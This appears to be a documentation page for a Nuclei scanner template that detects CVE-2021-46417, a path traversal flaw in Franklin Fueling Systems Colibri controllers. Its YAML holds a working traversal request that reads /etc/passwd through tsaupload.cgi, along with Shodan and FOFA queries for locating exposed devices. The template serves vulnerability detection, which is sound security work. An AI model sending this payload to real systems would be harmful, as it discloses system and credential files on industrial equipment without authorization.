Franklin Fueling Systems Colibri Controller Module 1.8.19.8580 - Local File Inclusion
ID: CVE-2021-46417
Severity: high
Author: For3stCo1d
Tags: cve2021,cve,packetstorm,franklinfueling,lfi
Description
Section titled “Description”Franklin Fueling Systems Colibri Controller Module 1.8.19.8580 is susceptible to local file inclusion because of insecure handling of a download function that leads to disclosure of internal files due to path traversal with root privileges.
YAML Source
Section titled “YAML Source”id: CVE-2021-46417
info: name: Franklin Fueling Systems Colibri Controller Module 1.8.19.8580 - Local File Inclusion author: For3stCo1d severity: high description: | Franklin Fueling Systems Colibri Controller Module 1.8.19.8580 is susceptible to local file inclusion because of insecure handling of a download function that leads to disclosure of internal files due to path traversal with root privileges. impact: | Successful exploitation of this vulnerability could lead to unauthorized access to sensitive information, including configuration files, credentials, and other sensitive data. remediation: | Apply the latest security patch or update provided by Franklin Fueling Systems to fix the LFI vulnerability. reference: - https://packetstormsecurity.com/files/166671/Franklin-Fueling-Systems-Colibri-Controller-Module-1.8.19.8580-Local-File-Inclusion.html - https://drive.google.com/drive/folders/1Yu4aVDdrgvs-F9jP3R8Cw7qo_TC7VB-R - http://packetstormsecurity.com/files/166610/FFS-Colibri-Controller-Module-1.8.19.8580-Directory-Traversal.html - https://nvd.nist.gov/vuln/detail/CVE-2021-46417 - https://github.com/KayCHENvip/vulnerability-poc classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2021-46417 cwe-id: CWE-22 epss-score: 0.64772 epss-percentile: 0.97891 cpe: cpe:2.3:o:franklinfueling:colibri_firmware:1.8.19.8580:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: franklinfueling product: colibri_firmware shodan-query: - http.html:"Franklin Fueling Systems" - http.html:"franklin fueling systems" fofa-query: body="franklin fueling systems" tags: cve2021,cve,packetstorm,franklinfueling,lfi
http: - method: GET path: - "{{BaseURL}}/cgi-bin/tsaupload.cgi?file_name=../../../../../..//etc/passwd&password="
matchers: - type: regex part: body regex: - "root:.*:0:0:"# digest: 4b0a00483046022100f6a1091dc3c9c475d0dfcec5f18cc4afa375bae7b164886d8a793d4f8e2c3cca0221008e91c3e628532c39cf0d1763717e57935dad426b717ce0235bd5efdfed3a9b4b:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-46417.yaml"